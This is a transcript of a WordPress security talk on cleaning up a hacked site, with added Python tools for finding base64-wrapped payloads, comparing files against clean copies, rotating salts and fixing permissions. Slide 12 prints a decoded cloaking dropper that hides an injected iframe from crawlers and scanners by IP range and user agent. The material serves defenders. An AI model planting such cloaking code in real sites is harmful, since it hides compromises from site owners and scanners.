You Have Been Hacked? Now What?

WordCamp San Diego 2015. Learn what you need to do once your website gets hacked, and how to keep it from happening again.

Michele Butcher

March 28, 2015
Transcript

  1. Your Site Has Been Hacked,
    Now What?
    Michele Butcher
    CantSpeakGeek.com WPSecurityLock.com
    @Michele_Butcher
    Slides can be found at: http://mlb.pw/WCSD2015

  2. WordPress Specialist at WP Security Lock
    Head Geek at Can’t Speak Geek
    Sometimes a designer of pretty websites and graphics
    Southern Illinois Meetup Co-Organizer
    Beginners and Intermediate WordPress Instructor at John A Logan College
    Michele Butcher

  3. It all starts one dreadful morning...

  4. First you see this

  5. Then you realize this has happened

  6. Which made you feel like this…

  7. What do you do when
    your site gets hacked?

  8. First option: Pay someone else to clean it.
    There are many services out there that will clean your site. Here is who I suggest.
    WP Security Lock
    https://wpsecuritylock.com
    Sucuri Security
    http://sucuri.net/
    Hack Repair
    http://hackrepair.com

  9. Second Option:
    Clean it yourself
    • Cheapest
    • Most time consuming
    • No one knows your site better than you do
    • You just have to know what to look for
    I do not suggest this if you are not comfortable
    reading HTML, PHP, and CSS.

  10. Pretty Code

  11. Not So Pretty Code
    eval(base64_decode('...')); (one long base64 blob, decoded on the next slide)

  12. The payload from the previous slide, decoded:
    <?php
    // Decoded contents of the slide-11 base64 blob: a cloaked iframe dropper.
    error_reporting(0);   // hide any PHP warnings the injected code causes
    $bot = FALSE;
    // User-agent fragments of crawlers, validators and scanners: these visitors get a clean page.
    $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex',
        'mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org',
        '12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com',
        'openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player',
        'vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
    // IP ranges (search-engine and scanner infrastructure) that also get a clean page.
    $stop_ips_masks = array(
        array("216.239.32.0","216.239.63.255"),
        array("64.68.80.0","64.68.87.255"),
        array("66.102.0.0","66.102.15.255"),
        array("64.233.160.0","64.233.191.255"),
        array("66.249.64.0","66.249.95.255"),
        array("72.14.192.0","72.14.255.255"),
        array("209.85.128.0","209.85.255.255"),
        array("198.108.100.192","198.108.100.207"),
        array("173.194.0.0","173.194.255.255"),
        array("216.33.229.144","216.33.229.151"),
        array("216.33.229.160","216.33.229.167"),
        array("209.185.108.128","209.185.108.255"),
        array("216.109.75.80","216.109.75.95"),
        array("64.68.88.0","64.68.95.255"),
        array("64.68.64.64","64.68.64.127"),
        array("64.41.221.192","64.41.221.207"),
        array("74.125.0.0","74.125.255.255"),
        array("65.52.0.0","65.55.255.255"),
        array("74.6.0.0","74.6.255.255"),
        array("67.195.0.0","67.195.255.255"),
        array("72.30.0.0","72.30.255.255"),
        array("38.0.0.0","38.255.255.255")
    );
    // Compare the visitor's address (as an unsigned integer) against every range.
    $my_ip2long = sprintf("%u", ip2long($_SERVER['REMOTE_ADDR']));
    foreach ($stop_ips_masks as $IPs) {
        $first_d = sprintf("%u", ip2long($IPs[0]));
        $second_d = sprintf("%u", ip2long($IPs[1]));
        if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) { $bot = TRUE; break; }
    }
    // Then match the user agent against the fragment list.
    foreach ($user_agent_to_filter as $bot_sign) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false) { $bot = true; break; }
    }
    if (!$bot) {
        // Every other visitor gets the injected markup: a hidden, off-screen iframe.
        // The HTML itself was lost when the slide text was extracted.
        echo '';
    }
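
As an added example (not code from the talk), a small Python scanner that does what a manual cleanup does by eye: find eval(base64_decode('...')) wrappers in PHP files, decode them, and report the cloaking traits seen in the slide-12 payload. The sample site it builds is constructed for the demo; the file and directory names are assumptions.

```python
import base64
import re
import tempfile
from pathlib import Path

# The wrapper from slide 11; the blob may be wrapped across lines, so whitespace is allowed.
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)")
# Traits of the decoded dropper on slide 12; any one of them is reason to quarantine the file.
TRAITS = {
    "error_reporting(0)": "silences PHP errors so the injection fails quietly",
    "HTTP_USER_AGENT": "cloaking: crawlers and scanners get a clean page",
    "REMOTE_ADDR": "cloaking: known scanner IP ranges get a clean page",
    "<iframe": "injects a hidden iframe into every page served",
}

def decode_payloads(source: str) -> list[str]:
    bodies = []  # decoded body of every eval(base64_decode('...')) call in a PHP source string
    for m in EVAL_B64.finditer(source):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            bodies.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            bodies.append("")  # malformed blob: still flagged, nothing to inspect
    return bodies

def scan_file(path: Path) -> list[str]:
    findings = []  # one line per payload, plus one per trait found inside it
    for i, body in enumerate(decode_payloads(path.read_text(errors="replace")), 1):
        findings.append(f"eval(base64_decode()) payload #{i}")
        findings += [f"  {k}: {why}" for k, why in TRAITS.items() if k in body]
    return findings

def scan_tree(root: Path) -> dict[str, list[str]]:
    return {p.relative_to(root).as_posix(): f for p in root.rglob("*.php") if (f := scan_file(p))}

# Constructed sample (not the real dropper): inner PHP mimicking the slide-12 logic, pointed at a
# reserved .invalid hostname, wrapped in eval(base64_decode()) inside a theme file.
INNER = ("error_reporting(0); $bot = FALSE; "
         "if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) { $bot = true; } "
         "if (!$bot) { echo '<div style=\"position:absolute;left:-1999px\">"
         "<iframe src=\"http://example.invalid/\"></iframe></div>'; }")

def build_sample_site() -> Path:
    site = Path(tempfile.mkdtemp())
    (site / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
    (site / "wp-content/themes/x").mkdir(parents=True)
    blob = base64.b64encode(INNER.encode()).decode()
    (site / "wp-content/themes/x/footer.php").write_text(
        "<?php eval(base64_decode('" + blob[:40] + "\n" + blob[40:] + "')); ?>\n")
    return site
```

Run scan_tree() over a real install to get a file-by-file list of what to inspect; every hit deserves a look even when no trait matches.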

  13. When cleaning your site, add clean copies of core, your theme and your plugins. It makes cleaning so much easier.
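
An added example (not code from the talk) of putting that clean copy to work: hash every file in the fresh download and in the live site, then list what the live site added or changed, skipping the files that legitimately differ (wp-config.php and uploads) but still reporting PHP under uploads, which never belongs there. Both sample trees and their contents are constructed.

```python
import hashlib
import tempfile
from pathlib import Path

# Paths that legitimately differ from a fresh download; review those by hand, not by hash.
SITE_SPECIFIC = ("wp-config.php", "wp-content/uploads/")

def tree_digest(root: Path) -> dict[str, str]:
    """relative path -> sha256 of every regular file under root."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file() and not p.is_symlink()}

def compare_to_clean(clean: Path, live: Path) -> dict[str, list[str]]:
    """What the live site added, changed or lost relative to the clean copy."""
    cl, lv = tree_digest(clean), tree_digest(live)

    def site_specific(rel: str) -> bool:
        return any(rel == s or rel.startswith(s) for s in SITE_SPECIFIC)

    return {
        "added": sorted(r for r in lv if r not in cl and not site_specific(r)),
        "modified": sorted(r for r in lv if r in cl and lv[r] != cl[r] and not site_specific(r)),
        "missing": sorted(r for r in cl if r not in lv),
        # uploads/ is skipped above, but PHP inside it is never legitimate, so report it anyway.
        "php_in_uploads": sorted(r for r in lv if r.startswith(SITE_SPECIFIC[1]) and r.endswith(".php")),
    }

def write_tree(root: Path, files: dict[str, str]) -> Path:
    for rel, text in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(text)
    return root

def build_sample_trees() -> tuple[Path, Path]:
    # Constructed: a "clean" download and a "live" site with one tampered core file,
    # one extra theme file, the site-specific files, and a PHP file hiding among uploads.
    core = {"index.php": "<?php require 'wp-blog-header.php';\n",
            "wp-includes/functions.php": "<?php function wp_version() { return '4.1'; }\n",
            "wp-content/themes/x/footer.php": "<?php wp_footer(); ?>\n"}
    clean = write_tree(Path(tempfile.mkdtemp()), core)
    live = write_tree(Path(tempfile.mkdtemp()), {**core,
        "wp-includes/functions.php": core["wp-includes/functions.php"] + "eval(base64_decode('...'));\n",
        "wp-content/themes/x/hidden.php": "<?php /* not part of the theme */ ?>\n",
        "wp-config.php": "<?php define('DB_NAME', 'wp');\n",
        "wp-content/uploads/2015/03/photo.jpg": "not really a jpeg\n",
        "wp-content/uploads/2015/03/thumb.php": "<?php /* should never be here */ ?>\n"})
    return clean, live
```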

  14. This is a good time to audit everything on your site and delete what is not being used. You can always add other themes and plugins back later when you need them.

  15. Now that you have all the malware removed, that does not mean you are done.

  16. Change the salts in your
    wp-config.php file
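
An added example (not code from the talk) that rotates the salts in place. The eight define() names are WordPress's own; the sample wp-config.php fragment is constructed. Rotating the salts invalidates every existing login cookie, which is exactly what you want after a compromise.

```python
import re
import secrets
import string

# The eight keys WordPress reads from wp-config.php (WordPress's own names).
SALT_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
# Printable ASCII minus whitespace and the two characters that need escaping
# inside a single-quoted PHP string.
ALPHABET = "".join(c for c in string.printable if not c.isspace() and c not in "'\\")
STOP_MARKER = "/* That's all, stop editing!"   # present in every stock wp-config.php

def new_salt(length: int = 64) -> str:
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def rotate_salts(config: str) -> str:
    """Fresh random value for each salt define; defines that are missing get added."""
    missing = []
    for key in SALT_KEYS:
        line = f"define('{key}', '{new_salt()}');"
        pattern = re.compile(r"define\(\s*'" + key + r"'\s*,\s*'[^']*'\s*\);")
        config, n = pattern.subn(lambda _m, line=line: line, config, count=1)
        if n == 0:
            missing.append(line)
    if missing:
        block = "\n".join(missing) + "\n"
        i = config.find(STOP_MARKER)
        config = config[:i] + block + config[i:] if i >= 0 else config + block
    return config

def salts_in(config: str) -> dict[str, str]:
    """Current value of each salt define, whatever the file holds right now."""
    found = re.findall(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\);", config)
    return {k: v for k, v in found if k in SALT_KEYS}

# Constructed wp-config.php fragment: placeholder values as shipped, with NONCE_SALT missing.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'wp');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
/* That's all, stop editing! Happy blogging. */
require_once(ABSPATH . 'wp-settings.php');
"""
```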

  17. Check your users!
    • You could have unwanted users
    • Delete the unwanted guests immediately
    • If you use “admin” as a username, delete it and make a new user name
    • Delete all users that are no longer using your dashboard (old devs, designers, guests)
    • Only give others the access they need, not what they want. A guest blogger should never be an admin, only a contributor.

  18. Check your FTP accounts on your server
    You could have unwanted users here as well

  19. Check your File Permissions
    Files should be 644
    Directories should be 755
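
An added example (not code from the talk) that audits a WordPress directory against those two modes and optionally fixes them. The sample tree, including the world-writable uploads directory and the deliberately stricter wp-config.php, is constructed for the demo.

```python
import os
import stat
import tempfile
from pathlib import Path

FILE_MODE, DIR_MODE = 0o644, 0o755

def audit_permissions(root, exceptions=None):
    """(relative path, actual mode, expected mode) for each entry that is not 644/755.

    exceptions maps a relative path to a deliberately different mode (for example a
    stricter 0o600 on wp-config.php) so that it is not reported."""
    exceptions = exceptions or {}
    bad = []
    for dirpath, dirnames, filenames in os.walk(root):
        entries = [(d, DIR_MODE) for d in dirnames] + [(f, FILE_MODE) for f in filenames]
        for name, expected in entries:
            p = Path(dirpath) / name
            if p.is_symlink():
                continue  # never chmod through a link
            rel = p.relative_to(root).as_posix()
            expected = exceptions.get(rel, expected)
            actual = stat.S_IMODE(p.lstat().st_mode)
            if actual != expected:
                bad.append((rel, f"{actual:o}", f"{expected:o}"))
    return bad

def fix_permissions(root, exceptions=None):
    """chmod every reported entry to its expected mode; returns what was changed."""
    findings = audit_permissions(root, exceptions)
    for rel, _actual, expected in findings:
        os.chmod(Path(root) / rel, int(expected, 8))
    return findings

def build_sample_tree():
    # Constructed: the shape an installer or a compromise tends to leave behind.
    root = Path(tempfile.mkdtemp())
    (root / "wp-content/uploads").mkdir(parents=True)
    for rel in ("index.php", "wp-config.php", "wp-content/uploads/cache.php"):
        (root / rel).write_text("<?php\n")
    os.chmod(root / "wp-content", 0o755)
    os.chmod(root / "wp-content/uploads", 0o777)   # world-writable: anyone on the box can drop files
    os.chmod(root / "index.php", 0o644)
    os.chmod(root / "wp-config.php", 0o600)        # stricter than 644 on purpose
    os.chmod(root / "wp-content/uploads/cache.php", 0o666)
    return root
```

The dangerous direction is extra write bits (777 directories, 666 files); a mode that is stricter than the slide's values belongs on the exceptions list rather than being loosened.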

  20. Add some security to your site
    Some trusted plugins:
    • iThemes Security or iThemes Security Pro
    • Jetpack (BruteProtect and VaultPress)
    • WordFence
    • Sucuri Firewall

  21. Change your login information
    • WordPress logins and passwords
    • cPanel logins and passwords
    • Database logins and passwords (remember to change them in your wp-config.php)
    • Hosting logins and passwords

  22. When it comes to usernames and passwords, here are a few tips.
    • NEVER use “admin” as a username and “password” as the password. NEVER on anything!
    • The harder a password is to remember, the harder it is to hack
    • Use something like LastPass, 1Password, or KeePass to store your passwords

  23. What do you do to not get
    hacked again?

  24. First and most important!
    UPDATE, UPDATE, UPDATE
    Update core, update plugins, update themes!

  25. A note on updating
    If you use a theme and/or plugin that was purchased from Envato, ThemeForest, or CodeCanyon, please tick the box under each purchased item on the download page to be notified by email of updates. That is the only way they notify their customers of updates.
    This is part of the reason the RevSlider SoakSoak infection was so widespread.

  26. Pay attention to WordPress
    news and security sites
    • WP Tavern
    • WP Security Bloggers
    • Sucuri Blog
    • WP Security Lock
    • Advanced WordPress (Facebook)
    • Twitter

  27. Only use trusted and supported themes and plugins
    Do NOT use a theme or plugin:
    • That has not been updated in more than a year
    • Whose support forum questions are going unanswered
    • That is marked as not working with the current version of core

  28. Start Making Backups
    • Backup Buddy
    • BackWPUp
    • VaultPress (Jetpack)
    • Check with your hosting company to see if they do
    backups as well
    • iThemes Security (free and Pro) will do database
    backups

  29. Speaking of backups...
    Save them somewhere other than your server. Most have options to send them to an Amazon S3 account, Dropbox, email, or download to your machine.

  30. Lastly, be active with your site. You know your site best. If something does not feel right, look into it. Also, do not ignore your website. No one likes a zombie website.

  31. And remember…

  32. Don’t Let Security Make You This Guy!

  33. Questions?

  34. Thank you!
    Michele Butcher
    http://CantSpeakGeek.com
    https://WPSecurityLock.com
    @Michele_Butcher
    Slides can be found at: http://mlb.pw/WCSD2015